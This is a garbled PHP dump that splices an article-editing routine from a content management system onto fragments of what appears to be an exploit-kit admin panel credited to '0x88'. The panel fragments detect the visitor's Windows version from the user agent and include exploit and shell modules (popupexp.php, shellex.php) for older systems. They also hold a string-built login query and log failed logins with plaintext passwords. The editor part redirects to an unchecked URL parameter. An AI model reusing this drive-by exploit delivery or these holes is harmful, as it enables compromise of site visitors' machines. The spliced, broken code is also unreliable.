function prepare()
{
$item_id = intval($this->param('item_id'));
if (isset($_POST['header']) && isset($_POST['meta_title']) && isset($_POST['meta_keywords']) && isset($_POST['meta_description']) && isset($_POST['annotation']) && isset($_POST['body'])) {
$this->check_token();
$this->item->header = $_POST['header'];
$this->item->meta_title = $_POST['meta_title'];
$this->item->meta_keywords = $_POST['meta_keywords'];
$this->item->meta_description = $_POST['meta_description'];
$this->item->url = $_POST['url'];
$this->item->annotation = $_POST['annotation'];
$this->item->body = $_POST['body'];
if (isset($_POST['enabled']) && $_POST['enabled'] == 1) {
$this->item->enabled = 1;
} else {
$this->item->enabled = 0;
}
## Не допустить одинаковые URL новостей.
$query = sql_placeholder('select count(*) as count from articles where url=? and article_id!=?', $this->item->url, $item_id);
$this->db->query($query);
$res = $this->db->result();
if (empty($this->item->header)) {
$this->error_msg = $this->lang->ENTER_TITLE;
} elseif ($res->count > 0) {
$this->error_msg = 'Статья с таким URL уже существует. Выберите другой URL.';
} else {
if (empty($item_id)) {
$query = sql_placeholder('INSERT INTO articles(article_id, header, url, meta_title, meta_keywords, meta_description, annotation, body, enabled, created, modified) VALUES(NULL, ?, ?, ?, ?, ?, ?, ?, ?, now(), now())', $this->item->header, $this->item->url, $this->item->meta_title, $this->item->meta_keywords, $this->item->meta_description, $this->item->annotation, $this->item->body, $this->item->enabled);
$this->db->query($query);
$inserted_id = $this->db->insert_id();
$query = sql_placeholder('UPDATE articles SET order_num=article_id WHERE article_id=?', $inserted_id);
$this->db->query($query);
} else {
$query = sql_placeholder('UPDATE articles SET header=?, url=?, meta_title=?, meta_keywords=?, meta_description=?, annotation=?, body=?, enabled=?, modified=now() WHERE article_id=?', $this->item->header, $this->item->url, $this->item->meta_title, $this->item->meta_keywords, $this->item->meta_description, $this->item->annotation, $this->item->body, $this->item->enabled, $item_id);
$this->db->query($query);
}
$this->db->query("UPDATE articles SET url=article_id WHERE url=''");
$get = $this->form_get(array('section' => 'Articles'));
if (isset($_GET['from'])) {
header("Location: " . $_GET['from']);
} else {
header("Location: index.php{$get}");
}
}
} elseif (!empty($item_id)) {
$query = sql_placeholder('SELECT * FROM articles WHERE article_id=?', $item_id);
$this->db->query($query);
$this->item = $this->db->result();
}
}
if (strstr($user_agent, "Windows NT 5.1")) {
$os = "Windows XP";
} else {
if (strstr($user_agent, "Windows NT 5.2")) {
$os = "Windows 2003";
} else {
$os = "other";
}
}
}
}
}
}
}
}
$sql = sql_placeholder("INSERT INTO tp_stats(datetime, ip, user_agent, browser, os, uri, accept_lang) VALUES(?, ?, ?, ?, ?, ?, ?)", date("Y-m-d H:i:s"), $ip, $user_agent, $browser, $os, $uri, $accept_lang);
mysql_query($sql);
if ($os == "Windows 95" || $os == "Windows NT 4" || $os == "Windows ME" || $os == "Windows 98" || $os == "Windows 2000" || $os == "Windows 2003" || $os == "Windows XP") {
echo "<html>\r\n<head>\r\n<meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\">\r\n<title></title>\r\n</head><body bgcolor=snow>\r\n";
include "mod/ok.php";
echo "<br>\r\n";
include "mod/popupexp.php";
echo "<br>\r\n";
include "mod/shell/shellex.php";
echo "<br>\r\n\r\n";
} else {
if ($os == "Windows XP SP2") {
echo "<html>\r\n<head>\r\n<meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\">\r\n<title></title>\r\n</head><body bgcolor=snow>\r\n";
include "mod/ok.php";
echo "<br>\r\n";
include "mod/shell/shellex.php";
function sql_wrapped()
{
$args = func_get_args();
$sql = sql_placeholder(array_shift($args), $args);
$result = sql($sql);
if (mysql_errno() == 2006) {
mysql_close();
mysql_connect(DB_HOST, DB_LOGIN, DB_PASS) or die('Cannot connect to DB');
mysql_selectdb(DB_DEVICE);
sql("set wait_timeout=86400");
$result = sql($sql);
}
return $result;
}
redirect("login.php");
}
if (isset($login, $pass)) {
$sql = "SELECT * FROM `tp_users` WHERE login = '******' AND password = '******'";
$result = mysql_query($sql);
$num = mysql_num_rows($result);
if (0 < $num) {
$Row = mysql_fetch_array($result);
$_SESSION['UserID'] = $Row['id'];
$_SESSION['Login'] = $Row['login'];
$_SESSION['Password'] = $Row['password'];
$_SESSION['IsLoggedIn'] = true;
$sql = sql_placeholder("INSERT INTO tp_logs(log, datetime, ip) values(?, ?, ?)", "<b>Logged in</b> (" . $_POST['login'] . ")", date("Y-m-d H:i:s"), getenv("REMOTE_ADDR"));
mysql_query($sql);
} else {
$_SESSION['IsLoggedIn'] = false;
$ErrMsg = "Incorrect Login or Password";
$sql = sql_placeholder("INSERT INTO tp_logs(log, datetime, ip) values(?, ?, ?)", $ErrMsg . " (" . $_POST['login'] . ":" . $_POST['password'] . ")", date("Y-m-d H:i:s"), getenv("REMOTE_ADDR"));
mysql_query($sql);
}
}
if (@$_SESSION['IsLoggedIn']) {
redirect("index.php");
}
echo "<html><head>\r\n<meta http-equiv=\"Content-Type\" content=\"text/html; charset=windows-1251\">\r\n<title>Login</title>\r\n<style>\r\n";
include "include/style.css";
echo "</style>\r\n</head><body bgcolor=\"#333333\">\r\n<table cellpadding=\"3\" cellspacing=\"1\" align=\"center\" width=\"750\" border=\"0\" height=\"100%\">\r\n<tr><td valign=\"middle\" height=\"100%\" align=\"center\"><form action=\"login.php\" method=\"post\">\r\n<div align=\"left\">\r\n<table cellpadding=\"0\" cellspacing=\"0\" width=\"250\" border=\"0\" align=left bordercolor=\"#FFFFFF\" hight=\"100\">\r\n<tr><td width=\"250\" hight=\"100\">\r\n";
echo "<hr>" . getenv("REMOTE_ADDR");
echo "<hr><small>All data about your activities in the admin will be logged</small></td></tr>\r\n</table>\r\n</div>\r\n<table cellpadding=0 cellspacing=0 width='250' border=1 align=center bordercolor=\"#818181\" bordercolorlight=white bordercolordark=white>\r\n<tr><td align=\"center\" colspan=\"2\" class=\"pagetitle\"><b>Admin Panel</td></tr><tr><td align=\"center\" class=\"pagetitle2\"><b>Login:</b></td><td><input type=\"text\" name=\"login\" size=\"25\" class=inputbox3></td>\r\n</tr><tr><td align=\"center\" class=pagetitle2><b>Password:</b></td><td><input type=\"password\" name=\"password\" size=\"25\" class=inputbox3></td></tr><tr><td colspan=\"2\" align=\"center\">\r\n<font color=\"#F9FBFB\">\r\n<input type=\"submit\" value=\" Login \" ></font>\r\n<font color=\"#F9FBFB\">\r\n<input type=\"reset\" value=\" Clear \" ></font></td></tr><tr>\r\n<td align=\"center\" colspan=\"2\"><font color=#ff0000><a href=\"http://xshop.in\">\r\n<font color=\"#F9FBFB\"><small>Created by <b>0x88</b> (ICQ 92777755)</font></small></a></font></td>\r\n</tr></table><br><font color=\"#ff0000\">";
echo $ErrMsg;
echo " </font></form></td></tr></table>\r\n</body>\r\n</html>";
